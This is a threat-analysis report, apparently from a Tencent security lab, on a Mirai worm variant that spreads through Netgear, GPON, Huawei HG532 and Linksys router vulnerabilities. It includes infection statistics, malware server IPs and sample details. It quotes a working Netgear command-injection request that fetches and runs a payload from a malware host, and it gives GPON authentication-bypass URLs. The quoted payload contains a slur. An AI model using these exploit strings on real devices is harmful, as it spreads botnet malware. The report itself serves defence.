Author: murphyzhang, xmy, hjchjcjh
Preface:
Recently, Tencent Security Cloud Ding laboratory's listening to the wind threat sensing platform monitoring found a worm attacking the router. After analysis, it was determined that this worm is a variant of Mirai virus. Unlike the previous Mirai virus, this worm not only attacks through the telnent burst used by the early generation of Mirai, but also spreads through the router vulnerability. It can be traced that the worm caught this time came from Philly, a hacker in Las Vegas, USA.
1、 Playload and vulnerability analysis
Four playloads are involved in the process of propagation and attack of the samples, which are all aimed at attacking routers. We will make a sample introduction and analysis of the relevant vulnerabilities.
Table playload situation
Attacked device
Equipment type
Vulnerability number
Netgear router
DGN1000、DGN2000
CNNVD-201306-024
GPON fiber router
H640GR-02、H640GV-03、H640GW-02、H640RW-02、H645G
CVE-2018-10561/62
Huawei hg532 Series Router
HG532
CVE-2017-17215
Linksys multiple routers
Cisco Linksys E4200 、EA4500、EA3500、EA2700、E1000、E2100L
CNVD-2014-01260
Figure affected equipment distribution
Data source: Tencent security Yunding Laboratory
The figure above shows the countries affected by the loopholes in several routers. China, Russia, Japan and the United States are the countries that suffered the most. It has a certain relationship with the development of the country and the popularity of the network, and has a strong relationship with the sales areas of the above-mentioned routers. Due to the large number of domestic equipment and low security, IOT security in China is facing great challenges in the future.
We will introduce these four vulnerabilities respectively:
01
Netgear router arbitrary Execution Vulnerability
(CNNVD-201306-024)
1) Vulnerability analysis:
POC executes setup.cgi through get method, syscmd through todo command, and download and execute virus command through syscmd.
'GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1\r\n\r\n'
The code is as follows:
A. After executing setup.cgi, execute setup Main:
B. POC can be submitted using both get and post methods:
After the todo parameter, directly call the related file for execution without any filtering. Here is also the place to be used. Directly call syscmd to execute the command you want.
2) Dissemination:
Figure attack statistics of remote arbitrary command execution of Netgear DGN device
Data source: Tencent security Yunding Laboratory
The vulnerability of Netgear is very rampant in Russia. It can be inferred that Netgear equipment has a large amount of inventory in Russia.
02
GPON fiber router Command Execution Vulnerability
(CVE-2018-10561/62)
1) Vulnerability analysis:
The HTTP server running on the device checks a specific path when authenticating, which can be used by an attacker to bypass authentication on any terminal.
By adding a specific parameter? Images / after the URL, you can finally obtain access rights:
http://ip:port/menu.html?images/
http://ip:port/GponForm/diag_FORM?images/
Figure gponplayload ▽
2) Dissemination:
Figure GPON device remote arbitrary command execution vulnerability attack statistics
Data source: Tencent security Yunding Laboratory
This vulnerability has a wide range of impacts, including China, Georgia and Egypt. The rapid development of optical fiber in China and the United States, Egypt and Georgia are affected by China, and the rapid development of optical fiber is also one of the reasons why they are affected by many equipment.
03
Huawei hg532 Series Router remote command execution vulnerability
(CVE-2017-17215)
1) Vulnerability analysis:
Figure hg532 playload ▽
We can observe that POC first submits an identity authentication information, and then executes the command you want to execute in the "newstatus URL" tag in upgrade. Module in UPnP, we found the UPnP module and found the newstatusurl tag. The code directly executed the command through system (upg-g-u% S-T 'firmware upgrade...'), without any filtering.
2) Dissemination:
Figure attack statistics of remote command execution vulnerability of Huawei hg532
Data source: Tencent security Yunding Laboratory
Figure cve-2017-17215 world impact range
Data source: Tencent security Yunding Laboratory
Through the infection of Huawei router, it can be seen that Huawei hg532 equipment has a good sales volume in China, Russia, Japan and other countries, and Japan and Russia are more affected. It can be seen that made in China has a greater influence on neighboring countries.
04
Linksys multiple routers tmunblock.cgi TTCP ﹣ IP parameter remote command execution vulnerability
(CNVD-2014-01260)
1) Vulnerability analysis:
Multiple Linksys routers are not properly filtered with the 'ttcp_ip' parameter value. There is a security vulnerability in the implementation of tmunblock.cgi script. A remote authenticated attacker can use this vulnerability to execute arbitrary commands. Affected products include, but are not limited to:
E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300 WAG320N WAP300N WAP610N WES610N WET610N WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N
2) Dissemination:
Figure Linksys remote command execution vulnerability statistics of multiple router devices
Data source: Tencent security Yunding Laboratory
The download address of relevant vulnerability samples is very fixed, and they are basically distributed in Las Vegas, Singapore, Moscow and Amsterdam. The black production of routers is basically active in these places.
Figure virus server distribution
Data source: Tencent security Yunding Laboratory
The detailed server distribution information is shown in the following table:
Table download IP address of related samples captured
Loophole
IP address
geographical position
GPON fiber router Command Execution Vulnerability (cve-2018-10561 / 62)
205.185.122.121(l.ocalhost.host)
Las Vegas, Nevada, USA
46.29.163.28(cnc.methaddict.xyz)
Moscow, Russia
46.17.47.82
Moscow, Russia
46.29.166.125
Moscow, Russia
194.182.65.56
Czech
128.199.137.201
Singapore
185.244.25.176
Amsterdam, Netherlands
159.89.204.166
Singapore
206.189.12.31
Amsterdam, Netherlands
128.199.222.37
Singapore
185.244.25.188
Amsterdam, Netherlands
185.223.163.17
Estonia
142.93.175.10
Frankfurt, Hesse, Germany
46.183.218.247
Latvia
185.244.25.194
Amsterdam, Netherlands
176.32.33.123
Moscow, Russia
Huawei hg532 Series Router remote command execution vulnerability (cve-2017-17215)
209.141.33.86
Las Vegas, Nevada, USA
167.88.161.40
Las Vegas, Nevada, USA
213.183.63.181
Sofia, Sofia, Bulgaria
195.62.53.38
Moscow, Russia
Linksys multiple routers tmunblock.cgi TTCP ﹣ IP parameter remote command execution vulnerability (cnvd-2014-01260)
209.141.33.119
Las Vegas, Nevada, USA
209.141.50.26
Las Vegas, Nevada, USA
185.244.25.222
Amsterdam, Netherlands
2、 Sample analysis
Sample MD5:
099b88bb74e9751abb4091ac4f1d690d
Source address Statistics (112.28.77.217): 13 times, mainly attacking ports 81 and 8080
Download IP: 46.17.47.82
Sample and Mirai are samples of the same family, which is a variant of Mirai virus. The code structure and the decrypted string are very similar, but this variant uses three router vulnerabilities for propagation.
The structure of Mirai BOT code is as follows:
It includes three modules: attack module, scan module and end module. The sample code structure is the same as Mirai, but three scan modules for router are added.
Different from the previous Mirai, it detects / dev / watchdog, / dev / misc / watchdog, / dev / ftwdt101_watchdog, / dev / ftwdt101 \ watchdog, / dev / ftwdt101 / watchdog, / SBIN / watchdog, / bin / watchdog, / dev / watchdog, / etc / default / watchdog, / etc / watchdog, etc. to avoid restart.
Compared with the traditional Mirai (/ dev / watchdog, / dev / misc / watchdog), there are many new watchdog detection.
It also contains the path used by linux.okiru to detect (/ dev / ftwdt101_watchdog, / dev / ftwdt101 \ watchdog).
The attack server contains many related files, different versions of files on various operating system platforms.
Sample traceability:
The following POC contains the relevant download address:
By visiting the link 46.17.47.82/cutie, we found that it contains the real download link.
The saved path is:
/tmp/gdf,/tmp/gxy,/tmp/dhf,/tmp/ttb;
Then directly access the root directory, including a twitter address:
Philly, the author of twitter, is an American. The path of virus storage is nigr (Philly's claim). No tweets directly related to worms have been found on twitter.
Figure related twitter screenshot
About sample capture:
Samples are captured through the wind listening threat perception platform of Tencent security Yunding laboratory. The wind listening threat perception platform is a honeypot network cluster deployed by Yunding laboratory in multiple nodes around the world, which is used to capture real malicious traffic and capture hundreds of millions of attacks every day.
The relevant capture interface is as follows:
Reference documents:
https://www.freebuf.com/vuls/171457.html
https://www.linuxidc.com/Linux/2014-02/97171.htm
https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/
Tencent Security Cloud Ding laboratory focuses on the security research and security operation of virtual machine and cloud traffic. Use machine learning and big data technology to monitor and analyze all kinds of risk information in real time to help customers resist Advanced Sustainable attacks; cooperate with all Tencent security labs to study security vulnerabilities to ensure the overall security of cloud computing platform. Relevant capabilities are opened through Tencent cloud to provide users with services such as hacker intrusion detection and vulnerability risk early warning to help enterprises solve server security problems.